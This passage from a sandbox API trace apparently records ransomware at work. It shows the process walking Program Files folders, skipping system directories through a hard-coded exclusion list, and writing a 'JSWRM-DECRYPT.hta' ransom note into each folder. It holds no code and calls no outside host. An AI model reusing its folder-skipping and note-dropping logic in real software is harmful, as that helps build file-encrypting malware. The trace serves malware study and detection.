hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f84e8 | out: hHeap=0x1e0000) returned 1 [0067.479] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0067.479] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0067.479] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241330 [0067.479] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x241330, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0067.479] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0067.479] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232c80 [0067.479] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2330f8 | out: hHeap=0x1e0000) returned 1 [0067.479] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241330 | out: hHeap=0x1e0000) returned 1 [0067.479] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241128 | out: hHeap=0x1e0000) returned 1 [0067.479] FindNextFileW (in: hFindFile=0x232140, lpFindFileData=0x345f360 | out: lpFindFileData=0x345f360*(dwFileAttributes=0x30, ftCreationTime.dwLowDateTime=0x17b3dd09, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa04663f2, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x4accd6e1, ftLastWriteTime.dwHighDateTime=0x1d327e9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x231c6a, cFileName="microsoft shared", cAlternateFileName="MICROS~1")) returned 1 [0067.480] lstrcmpiW (lpString1="microsoft shared", lpString2=".") returned 1 [0067.480] lstrcmpiW (lpString1="microsoft shared", lpString2="..") returned 1 [0067.480] lstrcmpiW (lpString1="microsoft shared", lpString2="...") returned 1 [0067.480] lstrcmpiW (lpString1="microsoft shared", lpString2="windows") returned -1 [0067.480] lstrcmpiW (lpString1="microsoft shared", lpString2="recovery") returned -1 [0067.480] lstrcmpiW (lpString1="microsoft shared", lpString2="perflogs") returned -1 [0067.480] lstrcmpiW (lpString1="microsoft shared", lpString2="documents and settings") returned 1 [0067.480] lstrcmpiW (lpString1="microsoft shared", lpString2="$RECYCLE.BIN") returned 1 [0067.480] lstrcmpiW (lpString1="microsoft shared", lpString2="system volume information") returned -1 [0067.480] lstrcmpiW (lpString1="microsoft shared", lpString2="msocache") returned -1 [0067.480] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232fc0 [0067.480] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232c80 | out: hHeap=0x1e0000) returned 1 [0067.480] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232ae0 [0067.480] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209878 [0067.480] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa6) returned 0x217300 [0067.480] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209878 | out: hHeap=0x1e0000) returned 1 [0067.480] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\jswrm-decrypt.hta")) returned 0xffffffff [0067.480] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x217300 | out: hHeap=0x1e0000) returned 1 [0067.480] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0067.480] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345c1c4, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0067.480] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f48 [0067.480] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1dc3) returned 0x24b1c8 [0067.480] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f48 | out: hHeap=0x1e0000) returned 1 [0067.480] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2c92) returned 0x24cf98 [0067.480] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b1c8 | out: hHeap=0x1e0000) returned 1 [0067.480] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209710 [0067.480] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa6) returned 0x216d80 [0067.480] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209710 | out: hHeap=0x1e0000) returned 1 [0067.480] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\jswrm-decrypt.hta"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3d4 [0067.481] SetFilePointer (in: hFile=0x3d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0067.481] WriteFile (in: hFile=0x3d4, lpBuffer=0x345c2d8*, nNumberOfBytesToWrite=0x230c, lpNumberOfBytesWritten=0x345c2a4, lpOverlapped=0x0 | out: lpBuffer=0x345c2d8*, lpNumberOfBytesWritten=0x345c2a4*=0x230c, lpOverlapped=0x0) returned 1 [0067.482] CloseHandle (hObject=0x3d4) returned 1 [0067.483] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x216d80 | out: hHeap=0x1e0000) returned 1 [0067.483] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24cf98 | out: hHeap=0x1e0000) returned 1 [0067.483] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232ae0 | out: hHeap=0x1e0000) returned 1 [0067.483] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x233028 [0067.483] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x233090 [0067.483] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x2330f8 [0067.483] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209620 [0067.483] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa6) returned 0x2173b0 [0067.483] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209620 | out: hHeap=0x1e0000) returned 1 [0067.483] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\jswrm-decrypt.hta")) returned 0x20 [0067.483] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2173b0 | out: hHeap=0x1e0000) returned 1 [0067.483] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2330f8 | out: hHeap=0x1e0000) returned 1 [0067.483] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209620 [0067.483] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\*.*", lpFindFileData=0x345eff8 | out: lpFindFileData=0x345eff8*(dwFileAttributes=0x30, ftCreationTime.dwLowDateTime=0x17b3dd09, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa04663f2, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1ee224c5, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x22c3c4, cFileName=".", cAlternateFileName="")) returned 0x232180 [0067.483] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0067.483] FindNextFileW (in: hFindFile=0x232180, lpFindFileData=0x345eff8 | out: lpFindFileData=0x345eff8*(dwFileAttributes=0x30, ftCreationTime.dwLowDateTime=0x17b3dd09, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa04663f2, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1ee224c5, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x22c3c4, cFileName="..", cAlternateFileName="")) returned 1 [0067.483] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0067.483] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0067.483] FindNextFileW (in: hFindFile=0x232180, lpFindFileData=0x345eff8 | out: lpFindFileData=0x345eff8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbf6c42af, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x81028f76, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x81028f76, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x22c3c4, cFileName="ClickToRun", cAlternateFileName="CLICKT~1")) returned 1 [0067.483] lstrcmpiW (lpString1="ClickToRun", lpString2=".") returned 1 [0067.483] lstrcmpiW (lpString1="ClickToRun", lpString2="..") returned 1 [0067.483] lstrcmpiW (lpString1="ClickToRun", lpString2="...") returned 1 [0067.483] lstrcmpiW (lpString1="ClickToRun", lpString2="windows") returned -1 [0067.484] lstrcmpiW (lpString1="ClickToRun", lpString2="recovery") returned -1 [0067.484] lstrcmpiW (lpString1="ClickToRun", lpString2="perflogs") returned -1 [0067.484] lstrcmpiW (lpString1="ClickToRun", lpString2="documents and settings") returned -1 [0067.484] lstrcmpiW (lpString1="ClickToRun", lpString2="$RECYCLE.BIN") returned 1 [0067.484] lstrcmpiW (lpString1="ClickToRun", lpString2="system volume information") returned -1 [0067.484] lstrcmpiW (lpString1="ClickToRun", lpString2="msocache") returned -1 [0067.484] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224d50 [0067.484] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209620 | out: hHeap=0x1e0000) returned 1 [0067.484] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224aa8 [0067.484] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224b30 [0067.484] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xbe) returned 0x1fc808 [0067.484] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224b30 | out: hHeap=0x1e0000) returned 1 [0067.484] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\jswrm-decrypt.hta")) returned 0xffffffff [0067.485] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0067.485] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0067.485] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345be5c, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0067.485] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241358 [0067.485] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1dc3) returned 0x24c1d0 [0067.485] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241358 | out: hHeap=0x1e0000) returned 1 [0067.485] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2c92) returned 0x24dfa0 [0067.485] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0067.485] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225328 [0067.485] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xbe) returned 0x1fc808 [0067.485] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225328 | out: hHeap=0x1e0000) returned 1 [0067.485] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\jswrm-decrypt.hta"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x298 [0067.486] SetFilePointer (in: hFile=0x298, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0067.486] WriteFile (in: hFile=0x298, lpBuffer=0x345bf70*, nNumberOfBytesToWrite=0x230c, lpNumberOfBytesWritten=0x345bf3c, lpOverlapped=0x0 | out: lpBuffer=0x345bf70*, lpNumberOfBytesWritten=0x345bf3c*=0x230c, lpOverlapped=0x0) returned 1 [0067.487] CloseHandle (hObject=0x298) returned 1 [0067.487] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0067.487] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24dfa0 | out: hHeap=0x1e0000) returned 1 [0067.487] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224aa8 | out: hHeap=0x1e0000) returned 1 [0067.487] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225080 [0067.487] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225108 [0067.487] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224bb8 [0067.488] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225768 [0067.488] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xbe) returned 0x1fc808 [0067.488] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225768 | out: hHeap=0x1e0000) returned 1 [0067.488] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\jswrm-decrypt.hta")) returned 0x20 [0067.488] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0067.488] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224bb8 | out: hHeap=0x1e0000) returned 1 [0067.488] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224aa8 [0067.488] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\*.*", lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbf6c42af, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x81028f76, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x1ee224c5, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x20942e, cFileName=".", cAlternateFileName="")) returned 0x231dc0 [0067.488] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0067.488] FindNextFileW (in: hFindFile=0x231dc0, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbf6c42af, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x81028f76, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x1ee224c5, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x20942e, cFileName="..", cAlternateFileName="")) returned 1 [0067.489] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0067.489] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0067.489] FindNextFileW (in: hFindFile=0x231dc0, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x809e6bf5, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x809e6bf5, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf6c5dd00, ftLastWriteTime.dwHighDateTime=0x1d0c58c, nFileSizeHigh=0x0, nFileSizeLow=0x48c0, dwReserved0=0x60002, dwReserved1=0x20942e, cFileName="api-ms-win-core-file-l1-2-0.dll", cAlternateFileName="API-MS~1.DLL")) returned 1 [0067.489] lstrcmpiW (lpString1="api-ms-win-core-file-l1-2-0.dll", lpString2=".") returned 1 [0067.489] lstrcmpiW (lpString1="api-ms-win-core-file-l1-2-0.dll", lpString2="..") returned 1 [0067.489] lstrcmpiW (lpString1="api-ms-win-core-file-l1-2-0.dll", lpString2="...") returned 1 [0067.489] lstrcmpiW (lpString1="api-ms-win-core-file-l1-2-0.dll", lpString2="windows") returned -1 [0067.489] lstrcmpiW (lpString1="api-ms-win-core-file-l1-2-0.dll", lpString2="recovery") returned -1 [0067.489] lstrcmpiW (lpString1="api-ms-win-core-file-l1-2-0.dll", lpString2="perflogs") returned -1 [0067.489] lstrcmpiW (lpString1="api-ms-win-core-file-l1-2-0.dll", lpString2="documents and settings") returned -1 [0067.489] lstrcmpiW (lpString1="api-ms-win-core-file-l1-2-0.dll", lpString2="$RECYCLE.BIN") returned 1 [0067.489] lstrcmpiW (lpString1="api-ms-win-core-file-l1-2-0.dll", lpString2="system volume information") returned -1 [0067.489] lstrcmpiW (lpString1="api-ms-win-core-file-l1-2-0.dll", lpString2="msocache") returned -1 [0067.489] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dec0 [0067.489] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="api-ms-win-core-file-l1-2-0.dll", cchWideChar=31, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 31 [0067.489] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412e0 [0067.489] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="api-ms-win-core-file-l1-2-0.dll", cchWideChar=31, lpMultiByteStr=0x2412e0, cbMultiByte=31, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="api-ms-win-core-file-l1-2-0.dll", lpUsedDefaultChar=0x0) returned 31 [0067.489] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dec0 | out: hHeap=0x1e0000) returned 1 [0067.489] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dec0 [0067.489] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="api-ms-win-core-file-l1-2-0.dll", cchWideChar=31, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 31 [0067.489] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241218 [0067.489] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="api-ms-win-core-file-l1-2-0.dll", cchWideChar=31, lpMultiByteStr=0x241218, cbMultiByte=31, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="api-ms-win-core-file-l1-2-0.dll", lpUsedDefaultChar=0x0) returned 31 [0067.489] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dec0 | out: hHeap=0x1e0000) returned 1 [0067.489] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x1fc808 [0067.489] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224aa8 | out: hHeap=0x1e0000) returned 1 [0067.490] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241218 | out: hHeap=0x1e0000) returned 1 [0067.490] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412e0 | out: hHeap=0x1e0000) returned 1 [0067.490] FindNextFileW (in: hFindFile=0x231dc0, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x809e6bf5, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x809e6bf5, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf6c5dd00, ftLastWriteTime.dwHighDateTime=0x1d0c58c, nFileSizeHigh=0x0, nFileSizeLow=0x48c0, dwReserved0=0x60002, dwReserved1=0x20942e, cFileName="api-ms-win-core-file-l2-1-0.dll", cAlternateFileName="API-MS~2.DLL")) returned 1 [0067.490] lstrcmpiW (lpString1="api-ms-win-core-file-l2-1-0.dll", lpString2=".") returned 1 [0067.490] lstrcmpiW (lpString1="api-ms-win-core-file-l2-1-0.dll", lpString2="..") returned 1 [0067.490] lstrcmpiW (lpString1="api-ms-win-core-file-l2-1-0.dll", lpString2="...") returned 1 [0067.490] lstrcmpiW (lpString1="api-ms-win-core-file-l2-1-0.dll", lpString2="windows") returned -1 [0067.490] lstrcmpiW (lpString1="api-ms-win-core-file-l2-1-0.dll", lpString2="recovery") returned -1 [0067.490] lstrcmpiW (lpString1="api-ms-win-core-file-l2-1-0.dll", lpString2="perflogs") returned -1 [0067.490] lstrcmpiW (lpString1="api-ms-win-core-file-l2-1-0.dll", lpString2="documents and settings") returned -1 [0067.490] lstrcmpiW (lpString1="api-ms-win-core-file-l2-1-0.dll", lpString2="$RECYCLE.BIN") returned 1 [0067.490] lstrcmpiW (lpString1="api-ms-win-core-file-l2-1-0.dll", lpString2="system volume information") returned -1 [0067.490] lstrcmpiW (lpString1="api-ms-win-core-file-l2-1-0.dll", lpString2="msocache") returned -1 [0067.490] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dec0 [0067.490] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="api-ms-win-core-file-l2-1-0.dll", cchWideChar=31, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 31 [0067.490] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0067.490] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="api-ms-win-core-file-l2-1-0.dll", cchWideChar=31, lpMultiByteStr=0x2410d8, cbMultiByte=31, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="api-ms-win-core-file-l2-1-0.dll", lpUsedDefaultChar=0x0) returned 31 [0067.490] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dec0 | out: hHeap=0x1e0000) returned 1 [0067.490] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dec0 [0067.490] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="api-ms-win-core-file-l2-1-0.dll", cchWideChar=31, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 31 [0067.490] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241308 [0067.490] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="api-ms-win-core-file-l2-1-0.dll", cchWideChar=31, lpMultiByteStr=0x241308, cbMultiByte=31, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="api-ms-win-core-file-l2-1-0.dll", lpUsedDefaultChar=0x0) returned 31 [0067.490] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dec0 | out: hHeap=0x1e0000) returned 1 [0067.490] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x21fab8 [0067.490] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0067.491] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241308 | out: hHeap=0x1e0000) returned 1 [0067.491] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0067.491] FindNextFileW (in: hFindFile=0x231dc0, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80a0ce4e, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x80a0ce4e, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf6c5dd00, ftLastWriteTime.dwHighDateTime=0x1d0c58c, nFileSizeHigh=0x0, nFileSizeLow=0x52c0, dwReserved0=0x60002, dwReserved1=0x20942e, cFileName="api-ms-win-core-localization-l1-2-0.dll", cAlternateFileName="API-MS~3.DLL")) returned 1 [0067.491] lstrcmpiW (lpString1="api-ms-win-core-localization-l1-2-0.dll", lpString2=".") returned 1 [0067.491] lstrcmpiW (lpString1="api-ms-win-core-localization-l1-2-0.dll", lpString2="..") returned 1 [0067.491] lstrcmpiW (lpString1="api-ms-win-core-localization-l1-2-0.dll", lpString2="...") returned 1 [0067.491] lstrcmpiW (lpString1="api-ms-win-core-localization-l1-2-0.dll", lpString2="windows") returned -1 [0067.491] lstrcmpiW (lpString1="api-ms-win-core-localization-l1-2-0.dll", lpString2="recovery") returned -1 [0067.491] lstrcmpiW (lpString1="api-ms-win-core-localization-l1-2-0.dll", lpString2="perflogs") returned -1 [0067.491] lstrcmpiW (lpString1="api-ms-win-core-localization-l1-2-0.dll", lpString2="documents and settings") returned -1 [0067.491] lstrcmpiW (lpString1="api-ms-win-core-localization-l1-2-0.dll", lpString2="$RECYCLE.BIN") returned 1 [0067.491] lstrcmpiW (lpString1="api-ms-win-core-localization-l1-2-0.dll", lpString2="system volume information") returned -1 [0067.491] lstrcmpiW (lpString1="api-ms-win-core-localization-l1-2-0.dll", lpString2="msocache") returned -1 [0067.491] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c538 [0067.491] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="api-ms-win-core-localization-l1-2-0.dll", cchWideChar=39, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 39 [0067.491] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0067.491] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="api-ms-win-core-localization-l1-2-0.dll", cchWideChar=39, lpMultiByteStr=0x1f8328, cbMultiByte=39, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="api-ms-win-core-localization-l1-2-0.dll", 